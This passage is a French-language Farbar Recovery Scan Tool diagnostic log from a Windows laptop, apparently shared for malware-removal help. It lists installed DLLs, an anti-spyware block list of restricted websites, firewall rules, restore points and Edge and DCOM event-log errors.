C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\RemindersUI.dll 2014-07-31 19:19 - 2014-02-13 16:34 - 00387984 _____ () C:\Program Files (x86)\Nuance\Dragon Assistant\Core\fl_core.dll 2014-07-31 19:19 - 2014-02-13 16:34 - 01165712 _____ () C:\Program Files (x86)\Nuance\Dragon Assistant\Core\vocon3200_asr.dll 2014-07-31 19:19 - 2014-02-13 16:34 - 00199056 _____ () C:\Program Files (x86)\Nuance\Dragon Assistant\Core\vocon3200_base.dll 2014-07-31 19:19 - 2014-02-13 16:34 - 00035216 _____ () C:\Program Files (x86)\Nuance\Dragon Assistant\Core\vocon3200_platform.dll 2014-07-31 19:19 - 2014-02-13 16:34 - 01132944 _____ () C:\Program Files (x86)\Nuance\Dragon Assistant\Core\vocon3200_pron.dll 2014-07-31 19:19 - 2014-02-13 16:34 - 00229264 _____ () C:\Program Files (x86)\Nuance\Dragon Assistant\Core\sdxg.dll 2017-05-14 22:02 - 2014-05-13 12:04 - 00109400 _____ () C:\Program Files (x86)\Spybot - Search & Destroy 2\snlThirdParty150.bpl 2017-05-14 22:02 - 2014-05-13 12:04 - 00167768 _____ () C:\Program Files (x86)\Spybot - Search & Destroy 2\snlFileFormats150.bpl 2017-05-14 22:02 - 2014-05-13 12:04 - 00416600 _____ () C:\Program Files (x86)\Spybot - Search & Destroy 2\DEC150.bpl 2017-05-14 22:02 - 2012-08-23 10:38 - 00574840 _____ () C:\Program Files (x86)\Spybot - Search & Destroy 2\sqlite3.dll 2017-05-14 22:02 - 2012-04-03 17:06 - 00565640 _____ () C:\Program Files (x86)\Spybot - Search & Destroy 2\av\BDSmartDB.dll 2013-12-27 21:53 - 2014-07-24 15:47 - 00102672 _____ () C:\Program Files (x86)\Lenovo\Lenovo Transition\Config\3200\TransitionLib.dll 2013-12-27 21:53 - 2014-07-24 15:47 - 00101648 _____ () C:\Program Files (x86)\Lenovo\Lenovo Transition\LUpdatePackage.dll 2013-12-27 21:35 - 2013-08-09 14:25 - 01242584 _____ () C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\LMS\ACE.dll ==================== Alternate Data Streams (Avec liste blanche) ========= (Si un élément est inclus dans le fichier fixlist.txt, seul le flux de données additionnel (ADS - Alternate Data Stream) sera supprimé.) ==================== Mode sans échec (Avec liste blanche) =================== (Si un élément est inclus dans le fichier fixlist.txt, il sera supprimé du Registre. Le "AlternateShell" sera restauré.) HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\MBAMService => ""="Service" HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\MBAMSwissArmy => ""="Driver" HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\MBAMService => ""="Service" HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\MBAMSwissArmy => ""="Driver" ==================== Association (Avec liste blanche) =============== (Si un élément est inclus dans le fichier fixlist.txt, l'élément de Registre sera restauré à la valeur par défaut ou supprimé.) ==================== Internet Explorer sites de confiance/sensibles =============== (Si un élément est inclus dans le fichier fixlist.txt, il sera supprimé du Registre.) IE restricted site: HKU\.DEFAULT\...\007guard.com -> install.007guard.com IE restricted site: HKU\.DEFAULT\...\008i.com -> 008i.com IE restricted site: HKU\.DEFAULT\...\008k.com -> www.008k.com IE restricted site: HKU\.DEFAULT\...\00hq.com -> www.00hq.com IE restricted site: HKU\.DEFAULT\...\010402.com -> 010402.com IE restricted site: HKU\.DEFAULT\...\032439.com -> 80gw6ry3i3x3qbrkwhxhw.032439.com IE restricted site: HKU\.DEFAULT\...\0scan.com -> www.0scan.com IE restricted site: HKU\.DEFAULT\...\1-2005-search.com -> www.1-2005-search.com IE restricted site: HKU\.DEFAULT\...\1-domains-registrations.com -> www.1-domains-registrations.com IE restricted site: HKU\.DEFAULT\...\1000gratisproben.com -> www.1000gratisproben.com IE restricted site: HKU\.DEFAULT\...\1001namen.com -> www.1001namen.com IE restricted site: HKU\.DEFAULT\...\100888290cs.com -> mir.100888290cs.com IE restricted site: HKU\.DEFAULT\...\100sexlinks.com -> www.100sexlinks.com IE restricted site: HKU\.DEFAULT\...\10sek.com -> www.10sek.com IE restricted site: HKU\.DEFAULT\...\12-26.net -> user1.12-26.net IE restricted site: HKU\.DEFAULT\...\12-27.net -> user1.12-27.net IE restricted site: HKU\.DEFAULT\...\123fporn.info -> www.123fporn.info IE restricted site: HKU\.DEFAULT\...\123haustiereundmehr.com -> www.123haustiereundmehr.com IE restricted site: HKU\.DEFAULT\...\123moviedownload.com -> www.123moviedownload.com IE restricted site: HKU\.DEFAULT\...\123simsen.com -> www.123simsen.com Il y a 7933 plus de sites. IE restricted site: HKU\S-1-5-21-2158510626-1631502160-3854817698-1005\...\007guard.com -> install.007guard.com IE restricted site: HKU\S-1-5-21-2158510626-1631502160-3854817698-1005\...\008i.com -> 008i.com IE restricted site: HKU\S-1-5-21-2158510626-1631502160-3854817698-1005\...\008k.com -> www.008k.com IE restricted site: HKU\S-1-5-21-2158510626-1631502160-3854817698-1005\...\00hq.com -> www.00hq.com IE restricted site: HKU\S-1-5-21-2158510626-1631502160-3854817698-1005\...\010402.com -> 010402.com IE restricted site: HKU\S-1-5-21-2158510626-1631502160-3854817698-1005\...\032439.com -> 80gw6ry3i3x3qbrkwhxhw.032439.com IE restricted site: HKU\S-1-5-21-2158510626-1631502160-3854817698-1005\...\0scan.com -> www.0scan.com IE restricted site: HKU\S-1-5-21-2158510626-1631502160-3854817698-1005\...\1-2005-search.com -> www.1-2005-search.com IE restricted site: HKU\S-1-5-21-2158510626-1631502160-3854817698-1005\...\1-domains-registrations.com -> www.1-domains-registrations.com IE restricted site: HKU\S-1-5-21-2158510626-1631502160-3854817698-1005\...\1000gratisproben.com -> www.1000gratisproben.com IE restricted site: HKU\S-1-5-21-2158510626-1631502160-3854817698-1005\...\1001namen.com -> www.1001namen.com IE restricted site: HKU\S-1-5-21-2158510626-1631502160-3854817698-1005\...\100888290cs.com -> mir.100888290cs.com IE restricted site: HKU\S-1-5-21-2158510626-1631502160-3854817698-1005\...\100sexlinks.com -> www.100sexlinks.com IE restricted site: HKU\S-1-5-21-2158510626-1631502160-3854817698-1005\...\10sek.com -> www.10sek.com IE restricted site: HKU\S-1-5-21-2158510626-1631502160-3854817698-1005\...\12-26.net -> user1.12-26.net IE restricted site: HKU\S-1-5-21-2158510626-1631502160-3854817698-1005\...\12-27.net -> user1.12-27.net IE restricted site: HKU\S-1-5-21-2158510626-1631502160-3854817698-1005\...\123fporn.info -> www.123fporn.info IE restricted site: HKU\S-1-5-21-2158510626-1631502160-3854817698-1005\...\123haustiereundmehr.com -> www.123haustiereundmehr.com IE restricted site: HKU\S-1-5-21-2158510626-1631502160-3854817698-1005\...\123moviedownload.com -> www.123moviedownload.com IE restricted site: HKU\S-1-5-21-2158510626-1631502160-3854817698-1005\...\123simsen.com -> www.123simsen.com Il y a 7933 plus de sites. IE restricted site: HKU\S-1-5-21-2158510626-1631502160-3854817698-1005-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-05272017162446547\...\007guard.com -> install.007guard.com IE restricted site: HKU\S-1-5-21-2158510626-1631502160-3854817698-1005-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-05272017162446547\...\008i.com -> 008i.com IE restricted site: HKU\S-1-5-21-2158510626-1631502160-3854817698-1005-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-05272017162446547\...\008k.com -> www.008k.com IE restricted site: HKU\S-1-5-21-2158510626-1631502160-3854817698-1005-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-05272017162446547\...\00hq.com -> www.00hq.com IE restricted site: HKU\S-1-5-21-2158510626-1631502160-3854817698-1005-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-05272017162446547\...\010402.com -> 010402.com IE restricted site: HKU\S-1-5-21-2158510626-1631502160-3854817698-1005-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-05272017162446547\...\032439.com -> 80gw6ry3i3x3qbrkwhxhw.032439.com IE restricted site: HKU\S-1-5-21-2158510626-1631502160-3854817698-1005-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-05272017162446547\...\0scan.com -> www.0scan.com IE restricted site: HKU\S-1-5-21-2158510626-1631502160-3854817698-1005-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-05272017162446547\...\1-2005-search.com -> www.1-2005-search.com IE restricted site: HKU\S-1-5-21-2158510626-1631502160-3854817698-1005-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-05272017162446547\...\1-domains-registrations.com -> www.1-domains-registrations.com IE restricted site: HKU\S-1-5-21-2158510626-1631502160-3854817698-1005-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-05272017162446547\...\1000gratisproben.com -> www.1000gratisproben.com IE restricted site: HKU\S-1-5-21-2158510626-1631502160-3854817698-1005-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-05272017162446547\...\1001namen.com -> www.1001namen.com IE restricted site: HKU\S-1-5-21-2158510626-1631502160-3854817698-1005-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-05272017162446547\...\100888290cs.com -> mir.100888290cs.com IE restricted site: HKU\S-1-5-21-2158510626-1631502160-3854817698-1005-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-05272017162446547\...\100sexlinks.com -> www.100sexlinks.com IE restricted site: HKU\S-1-5-21-2158510626-1631502160-3854817698-1005-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-05272017162446547\...\10sek.com -> www.10sek.com IE restricted site: HKU\S-1-5-21-2158510626-1631502160-3854817698-1005-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-05272017162446547\...\12-26.net -> user1.12-26.net IE restricted site: HKU\S-1-5-21-2158510626-1631502160-3854817698-1005-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-05272017162446547\...\12-27.net -> user1.12-27.net IE restricted site: HKU\S-1-5-21-2158510626-1631502160-3854817698-1005-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-05272017162446547\...\123fporn.info -> www.123fporn.info IE restricted site: HKU\S-1-5-21-2158510626-1631502160-3854817698-1005-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-05272017162446547\...\123haustiereundmehr.com -> www.123haustiereundmehr.com IE restricted site: HKU\S-1-5-21-2158510626-1631502160-3854817698-1005-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-05272017162446547\...\123moviedownload.com -> www.123moviedownload.com IE restricted site: HKU\S-1-5-21-2158510626-1631502160-3854817698-1005-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-05272017162446547\...\123simsen.com -> www.123simsen.com Il y a 7933 plus de sites. ==================== Hosts contenu: =============================== (Si nécessaire, la commande Hosts: peut être incluse dans le fichier fixlist.txt afin de réinitialiser le fichier hosts.) 2017-05-14 22:45 - 2017-05-14 22:45 - 00001048 ____N C:\WINDOWS\system32\Drivers\etc\hosts ==================== Autres zones ============================ (Actuellement, il n'y a pas de correction automatique pour cette section.) HKU\S-1-5-19-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-05272017162446451\Control Panel\Desktop\\Wallpaper -> C:\Windows\Web\Wallpaper\Windows\img0.jpg HKU\S-1-5-20-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-05272017162446513\Control Panel\Desktop\\Wallpaper -> C:\Windows\Web\Wallpaper\Windows\img0.jpg HKU\S-1-5-21-2158510626-1631502160-3854817698-1005\Control Panel\Desktop\\Wallpaper -> C:\Users\Hélène\Desktop\bg1.jpg HKU\S-1-5-21-2158510626-1631502160-3854817698-1005-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-05272017162446547\Control Panel\Desktop\\Wallpaper -> C:\Users\Hélène\Desktop\bg1.jpg DNS Servers: 89.2.0.1 - 89.2.0.2 HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System => (ConsentPromptBehaviorAdmin: 2) (ConsentPromptBehaviorUser: 3) (EnableLUA: 1) Le Pare-feu est activé. ==================== MSCONFIG/TASK MANAGER éléments désactivés == HKLM\...\StartupApproved\Run: => "Yoga PhoneCompanion" HKLM\...\StartupApproved\Run: => "iTunesHelper" HKLM\...\StartupApproved\Run32: => "Adobe ARM" HKU\S-1-5-21-2158510626-1631502160-3854817698-1005\...\StartupApproved\Run: => "Spotify" HKU\S-1-5-21-2158510626-1631502160-3854817698-1005\...\StartupApproved\Run: => "Spotify Web Helper" HKU\S-1-5-21-2158510626-1631502160-3854817698-1005-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-05272017162446547\...\StartupApproved\Run: => "Spotify" HKU\S-1-5-21-2158510626-1631502160-3854817698-1005-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-05272017162446547\...\StartupApproved\Run: => "Spotify Web Helper" ==================== RèglesPare-feu (Avec liste blanche) =============== (Si un élément est inclus dans le fichier fixlist.txt, il sera supprimé du Registre. Le fichier ne sera pas déplacé, sauf s'il est inscrit séparément.) FirewallRules: [{AB5F45C1-DBD8-4D07-A7B4-712E8078F4C6}] => (Allow) C:\Program Files\Microsoft Office\Office15\UcMapi.exe FirewallRules: [{69C7719B-48E0-4570-8DD2-273C7C2A3844}] => (Allow) C:\Program Files\Microsoft Office\Office15\UcMapi.exe FirewallRules: [{D59A755F-1046-42E5-8912-005897D1CA0D}] => (Allow) C:\Program Files\Microsoft Office\Office15\lync.exe FirewallRules: [{6E017A86-7A1A-435B-B6B7-A3A2C317B1E9}] => (Allow) C:\Program Files\Microsoft Office\Office15\lync.exe FirewallRules: [{92870B75-0091-43A3-B3DC-F26C0146A525}] => (Allow) LPort=1900 FirewallRules: [{7CF6A7D2-D9FF-472E-931B-C02D0D03C260}] => (Allow) LPort=2869 FirewallRules: [{96829AC5-8D23-4426-81CA-FB610AC0C266}] => (Allow) C:\Program Files (x86)\Windows Live\Contacts\wlcomm.exe FirewallRules: [{322AAC6A-958E-4C23-819B-354BA149ADEC}] => (Allow) C:\Program Files\CyberLink\PowerDirector10\PDR10.EXE FirewallRules: [{85368568-D1E7-4734-914F-42DD325E877D}] => (Allow) C:\Program Files\Microsoft Office\Office15\lync.exe FirewallRules: [{C320C9F1-DF14-407E-B989-E44AA0226A8C}] => (Allow) C:\Program Files\Microsoft Office\Office15\lync.exe FirewallRules: [{06218B92-F43E-418D-AC64-BFCE8EAD2F41}] => (Allow) C:\Program Files\Microsoft Office\Office15\UcMapi.exe FirewallRules: [{5DE65158-B96B-44E4-81CE-88A96BBEAA0A}] => (Allow) C:\Program Files\Microsoft Office\Office15\UcMapi.exe FirewallRules: [{AE1B33B4-F487-4ED6-A6AC-2A7A7503FEFC}] => (Allow) C:\Program Files (x86)\HP\Digital Imaging\bin\hpqtra08.exe FirewallRules: [{BD4082F1-F882-45D7-9051-1B8DE379F87A}] => (Allow) C:\Program Files (x86)\HP\Digital Imaging\bin\hpqste08.exe FirewallRules: [{A8F99537-3E1E-4F21-8FEE-EEDD16DB0307}] => (Allow) C:\Program Files (x86)\HP\Digital Imaging\bin\hposid01.exe FirewallRules: [{A3CD28C6-DDC8-4273-A743-AB6229684036}] => (Allow) C:\Program Files (x86)\HP\Digital Imaging\bin\hpqkygrp.exe FirewallRules: [{E44252D7-BA7C-4255-9709-E1C3EB523614}] => (Allow) C:\Program Files (x86)\HP\Digital Imaging\bin\hpqcopy2.exe FirewallRules: [{C9EE5B86-50C4-4F3D-8D3D-4271A852381C}] => (Allow) C:\Program Files (x86)\HP\Digital Imaging\bin\hpfccopy.exe FirewallRules: [{52AD0FC6-4673-4058-96F3-504CB48EE360}] => (Allow) C:\Program Files (x86)\HP\Digital Imaging\bin\hpoews01.exe FirewallRules: [{F7D3E32A-D51A-4E25-8150-344FD47279AD}] => (Allow) C:\Program Files (x86)\HP\Digital Imaging\bin\hpiscnapp.exe FirewallRules: [{28474161-3140-4433-A543-051F2D430612}] => (Allow) C:\Program Files (x86)\HP\Digital Imaging\bin\hpqgplgtupl.exe FirewallRules: [{C3DBC0B3-B326-4ED6-A0D0-36934D40AD08}] => (Allow) C:\Program Files (x86)\HP\Digital Imaging\bin\hpqgpc01.exe FirewallRules: [{F55F5E9A-2615-4DE8-BF00-D8534CC6FE6C}] => (Allow) C:\Program Files (x86)\HP\Digital Imaging\bin\hpqusgm.exe FirewallRules: [{269269F7-FC80-433C-9A95-AC932BD6657F}] => (Allow) C:\Program Files (x86)\HP\Digital Imaging\bin\hpqusgh.exe FirewallRules: [{0B74EB15-63F2-4FD8-9664-4E2ACBE10003}] => (Allow) C:\Program Files (x86)\HP\hp software update\hpwucli.exe FirewallRules: [{14DF5228-46D2-4C44-909B-9C620F5FEF6E}] => (Allow) C:\Program Files\Bonjour\mDNSResponder.exe FirewallRules: [{2F4815A9-8268-4FC5-BB54-8DFD209F5C6A}] => (Allow) C:\Program Files\Bonjour\mDNSResponder.exe FirewallRules: [{2DC46D7C-81BF-45ED-AE16-76C1FD646E3E}] => (Allow) C:\Program Files (x86)\Bonjour\mDNSResponder.exe FirewallRules: [{81AE1F47-2504-4BB6-BE02-AD5D0B8C04E3}] => (Allow) C:\Program Files (x86)\Bonjour\mDNSResponder.exe FirewallRules: [{74A47370-ACBF-4377-9A04-4155E68E3E75}] => (Allow) C:\Program Files (x86)\Sony Mobile\Update Engine\Sony Mobile Update Engine.exe FirewallRules: [{271D7683-0C9C-4893-8B4F-1282591E1591}] => (Allow) C:\Program Files (x86)\Sony Mobile\Update Engine\Sony Mobile Update Engine.exe FirewallRules: [{64362CB0-28A0-4BB5-A5C5-43143492B899}] => (Allow) C:\Program Files (x86)\HP\Digital Imaging\{FD126052-310E-4364-937B-6B5564F24578}\setup\hpznui40.exe FirewallRules: [TCP Query User{C30E561B-4A15-46E6-8B34-C2F9A5071A5F}C:\program files (x86)\smart view\smart view.exe] => (Allow) C:\program files (x86)\smart view\smart view.exe FirewallRules: [UDP Query User{A52686F6-0D06-424F-9C2F-BAF81DDDF619}C:\program files (x86)\smart view\smart view.exe] => (Allow) C:\program files (x86)\smart view\smart view.exe FirewallRules: [{CCC7155A-0F1B-44D8-A91A-ACE422D8B9C4}] => (Block) C:\program files (x86)\smart view\smart view.exe FirewallRules: [{0B033BFF-C102-41D1-B312-529AB146E406}] => (Block) C:\program files (x86)\smart view\smart view.exe FirewallRules: [TCP Query User{AEE51951-F86E-4685-A7CD-FE5A287D9804}C:\users\hélène\appdata\roaming\spotify\spotify.exe] => (Block) C:\users\hélène\appdata\roaming\spotify\spotify.exe FirewallRules: [UDP Query User{82F6049C-BA70-46F8-B022-8AC2BB7CE914}C:\users\hélène\appdata\roaming\spotify\spotify.exe] => (Block) C:\users\hélène\appdata\roaming\spotify\spotify.exe FirewallRules: [{1267E728-8E91-468E-9060-A111E2CCFFB8}] => (Allow) C:\Program Files (x86)\Sony\Xperia Companion\XperiaCompanion.exe FirewallRules: [TCP Query User{16F62EE0-A031-466B-AE1B-538EFFCAF424}C:\users\hélène\appdata\roaming\spotify\spotify.exe] => (Allow) C:\users\hélène\appdata\roaming\spotify\spotify.exe FirewallRules: [UDP Query User{EE936FA1-809C-405B-80D1-505814B9639D}C:\users\hélène\appdata\roaming\spotify\spotify.exe] => (Allow) C:\users\hélène\appdata\roaming\spotify\spotify.exe FirewallRules: [{0105BD0A-3D89-4EDF-918E-12AC9BABC147}] => (Allow) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe StandardProfile\AuthorizedApplications: [C:\Program Files (x86)\Spybot - Search & Destroy 2\SDTray.exe] => Enabled:Spybot - Search & Destroy tray access StandardProfile\AuthorizedApplications: [C:\Program Files (x86)\Spybot - Search & Destroy 2\SDFSSvc.exe] => Enabled:Spybot-S&D 2 Scanner Service StandardProfile\AuthorizedApplications: [C:\Program Files (x86)\Spybot - Search & Destroy 2\SDUpdate.exe] => Enabled:Spybot-S&D 2 Updater StandardProfile\AuthorizedApplications: [C:\Program Files (x86)\Spybot - Search & Destroy 2\SDUpdSvc.exe] => Enabled:Spybot-S&D 2 Background update service ==================== Points de restauration ========================= 24-05-2017 16:54:54 Windows Update 27-05-2017 11:58:22 Removed Google Chrome ==================== Éléments en erreur du Gestionnaire de périphériques ============= Name: Deskjet F4500 series Description: Deskjet F4500 series Class Guid: {4d36e971-e325-11ce-bfc1-08002be10318} Manufacturer: HP Service: Problem: : This device is disabled. (Code 22) Resolution: In Device Manager, click "Action", and then click "Enable Device". This starts the Enable Device wizard. Follow the instructions. ==================== Erreurs du Journal des événements: ========================= Erreurs Application: ================== Error: (05/27/2017 03:25:31 PM) (Source: Microsoft-Windows-Immersive-Shell) (EventID: 5973) (User: LENOVO-PC-HELEN) Description: Échec de l’activation de l’application Microsoft.MicrosoftEdge_8wekyb3d8bbwe!MicrosoftEdge avec l’erreur : -2147023170 Pour plus d’informations, voir le journal Microsoft-Windows-TWinUI/Opérationnel. Error: (05/27/2017 03:25:29 PM) (Source: Application Error) (EventID: 1000) (User: ) Description: Nom de l’application défaillante MicrosoftEdge.exe, version : 11.0.14393.1198, horodatage : 0x5902810b Nom du module défaillant : eModel.dll, version : 11.0.14393.1198, horodatage : 0x59028265 Code d’exception : 0xc0000409 Décalage d’erreur : 0x00000000000d4810 ID du processus défaillant : 0xf20 Heure de début de l’application défaillante : 0x01d2d6ecb53e4003 Chemin d’accès de l’application défaillante : C:\WINDOWS\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe Chemin d’accès du module défaillant: C:\WINDOWS\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\eModel.dll ID de rapport : ef779eab-976e-4103-a329-f93c705ad5c2 Nom complet du package défaillant : Microsoft.MicrosoftEdge_38.14393.1066.0_neutral__8wekyb3d8bbwe ID de l’application relative au package défaillant : MicrosoftEdge Error: (05/27/2017 03:22:19 PM) (Source: Microsoft-Windows-Immersive-Shell) (EventID: 5973) (User: LENOVO-PC-HELEN) Description: Échec de l’activation de l’application Microsoft.MicrosoftEdge_8wekyb3d8bbwe!MicrosoftEdge avec l’erreur : -2147023170 Pour plus d’informations, voir le journal Microsoft-Windows-TWinUI/Opérationnel. Error: (05/27/2017 03:22:18 PM) (Source: Application Error) (EventID: 1000) (User: ) Description: Nom de l’application défaillante MicrosoftEdge.exe, version : 11.0.14393.1198, horodatage : 0x5902810b Nom du module défaillant : eModel.dll, version : 11.0.14393.1198, horodatage : 0x59028265 Code d’exception : 0xc0000409 Décalage d’erreur : 0x00000000000d4810 ID du processus défaillant : 0x2390 Heure de début de l’application défaillante : 0x01d2d6ec4311ba7b Chemin d’accès de l’application défaillante : C:\WINDOWS\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe Chemin d’accès du module défaillant: C:\WINDOWS\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\eModel.dll ID de rapport : d69009e8-d13d-4551-934d-127053fb42b1 Nom complet du package défaillant : Microsoft.MicrosoftEdge_38.14393.1066.0_neutral__8wekyb3d8bbwe ID de l’application relative au package défaillant : MicrosoftEdge Error: (05/27/2017 03:18:23 PM) (Source: Application Error) (EventID: 1000) (User: ) Description: Nom de l’application défaillante adwcleaner_6.047.exe, version : 6.0.4.7, horodatage : 0x591e43a6 Nom du module défaillant : adwcleaner_6.047.exe, version : 6.0.4.7, horodatage : 0x591e43a6 Code d’exception : 0xc0000005 Décalage d’erreur : 0x00020fea ID du processus défaillant : 0x890 Heure de début de l’application défaillante : 0x01d2d6eb899a583a Chemin d’accès de l’application défaillante : C:\Users\Hélène\Downloads\programmes\adwcleaner_6.047.exe Chemin d’accès du module défaillant: C:\Users\Hélène\Downloads\programmes\adwcleaner_6.047.exe ID de rapport : 1fdf9472-8c15-464a-980f-aecc525bf894 Nom complet du package défaillant : ID de l’application relative au package défaillant : Error: (05/27/2017 02:58:39 PM) (Source: Application Hang) (EventID: 1002) (User: ) Description: Le programme wlsetup-web.exe version 16.4.3528.331 a cessé d'interagir avec Windows et a été fermé. Pour déterminer si des informations supplémentaires sont disponibles, consultez l'historique du problème dans le panneau de configuration Sécurité et maintenance. ID de processus : 2678 Heure de début : 01d2d6e8ce314db4 Heure de fin : 4294967295 Chemin d'accès de l'application : C:\Users\Hélène\Desktop\LN\AUTRES\wlsetup-web.exe ID de rapport : 332dcf81-42dc-11e7-832b-5c514fb7c7de Nom complet du package défaillant : ID de l'application relative au package défaillant : Error: (05/27/2017 02:53:31 PM) (Source: MsiInstaller) (EventID: 11721) (User: LENOVO-PC-HELEN) Description: Product: Google Chrome -- Error 1721. There is a problem with this Windows Installer package. A program required for this install to complete could not be run. Contact your support personnel or package vendor. Action: CallUninstaller, location: C:\Program Files (x86)\Google\Chrome\Application\58.0.3029.110\Installer\setup.exe, command: --uninstall --msi --system-level --verbose-logging --force-uninstall Error: (05/27/2017 02:53:16 PM) (Source: Microsoft-Windows-Immersive-Shell) (EventID: 5973) (User: LENOVO-PC-HELEN) Description: Échec de l’activation de l’application Microsoft.SkypeApp_kzf8qxf38zg5c!ppleae38af2e007f4358a809ac99a64a67c1 avec l’erreur : -2147024891 Pour plus d’informations, voir le journal Microsoft-Windows-TWinUI/Opérationnel. Error: (05/27/2017 02:51:34 PM) (Source: Application Error) (EventID: 1000) (User: ) Description: Nom de l’application défaillante MicrosoftEdge.exe, version : 11.0.14393.1198, horodatage : 0x5902810b Nom du module défaillant : eModel.dll, version : 11.0.14393.1198, horodatage : 0x59028265 Code d’exception : 0xc0000409 Décalage d’erreur : 0x00000000000d4810 ID du processus défaillant : 0x25a8 Heure de début de l’application défaillante : 0x01d2d6e7f87ee746 Chemin d’accès de l’application défaillante : C:\WINDOWS\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe Chemin d’accès du module défaillant: C:\WINDOWS\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\eModel.dll ID de rapport : 5d45f21b-911e-4c3b-b29c-3b1a0f5d4c74 Nom complet du package défaillant : Microsoft.MicrosoftEdge_38.14393.1066.0_neutral__8wekyb3d8bbwe ID de l’application relative au package défaillant : MicrosoftEdge Error: (05/27/2017 02:51:30 PM) (Source: Application Error) (EventID: 1000) (User: ) Description: Nom de l’application défaillante MicrosoftEdge.exe, version : 11.0.14393.1198, horodatage : 0x5902810b Nom du module défaillant : eModel.dll, version : 11.0.14393.1198, horodatage : 0x59028265 Code d’exception : 0xc0000409 Décalage d’erreur : 0x00000000000d4810 ID du processus défaillant : 0x22c0 Heure de début de l’application défaillante : 0x01d2d6e7f4f18de5 Chemin d’accès de l’application défaillante : C:\WINDOWS\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe Chemin d’accès du module défaillant: C:\WINDOWS\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\eModel.dll ID de rapport : 9f9cc607-6596-4799-9808-d4e4d54c83f2 Nom complet du package défaillant : Microsoft.MicrosoftEdge_38.14393.1066.0_neutral__8wekyb3d8bbwe ID de l’application relative au package défaillant : MicrosoftEdge Erreurs système: ============= Error: (05/27/2017 04:11:02 PM) (Source: DCOM) (EventID: 10010) (User: AUTORITE NT) Description: Le serveur {784E29F4-5EBE-4279-9948-1E8FE941646D} ne s’est pas enregistré sur DCOM avant la fin du temps imparti. Error: (05/27/2017 04:08:02 PM) (Source: Service Control Manager) (EventID: 7023) (User: ) Description: Le service CDPUserSvc_4e874 s’est arrêté avec l’erreur : Erreur non spécifiée Error: (05/27/2017 04:07:43 PM) (Source: DCOM) (EventID: 10016) (User: AUTORITE NT) Description: Les paramètres d’autorisation propres à l’application n’accordent pas l’autorisation Local Activation pour l’application serveur COM avec le CLSID {6B3B8D23-FA8D-40B9-8DBD-B950333E2C52} et l’APPID {4839DDB7-58C2-48F5-8283-E1D1807D0D7D} au SID AUTORITE NT\SERVICE LOCAL de l’utilisateur (S-1-5-19) depuis l’adresse LocalHost (avec LRPC) s’exécutant dans le SID Non disponible du conteneur d’applications (Non disponible). Cette autorisation de sécurité peut être modifiée à l’aide de l’outil d’administration Services de composants. Error: (05/27/2017 04:07:43 PM) (Source: DCOM) (EventID: 10016) (User: AUTORITE NT) Description: Les paramètres d’autorisation propres à l’application n’accordent pas l’autorisation Local Activation pour l’application serveur COM avec le CLSID {6B3B8D23-FA8D-40B9-8DBD-B950333E2C52} et l’APPID {4839DDB7-58C2-48F5-8283-E1D1807D0D7D} au SID AUTORITE NT\SERVICE LOCAL de l’utilisateur (S-1-5-19) depuis l’adresse LocalHost (avec LRPC) s’exécutant dans le SID Non disponible du conteneur d’applications (Non disponible). Cette autorisation de sécurité peut être modifiée à l’aide de l’outil d’administration Services de composants. Error: (05/27/2017 04:07:39 PM) (Source: Service Control Manager) (EventID: 7000) (User: ) Description: Le service SDWSCService n’a pas pu démarrer en raison de l’erreur : Un certificat requis n’est pas dans sa période de validité selon la vérification par rapport à l’horloge système en cours ou le tampon daté dans le fichier signé. Error: (05/27/2017 04:07:38 PM) (Source: Microsoft-Windows-DNS-Client) (EventID: 1012) (User: AUTORITE NT) Description: Une erreur s’est produite lors de la lecture du fichier d’hôtes local. Error: (05/27/2017 04:05:30 PM) (Source: DCOM) (EventID: 10016) (User: AUTORITE NT) Description: Les paramètres d’autorisation propres à l’application n’accordent pas l’autorisation Local Activation pour l’application serveur COM avec le CLSID {D63B10C5-BB46-4990-A94F-E40B9D520160} et l’APPID {9CA88EE3-ACB7-47C8-AFC4-AB702511C276} au SID AUTORITE NT\Système de l’utilisateur (S-1-5-18) depuis l’adresse LocalHost (avec LRPC) s’exécutant dans le SID Non disponible du conteneur d’applications (Non 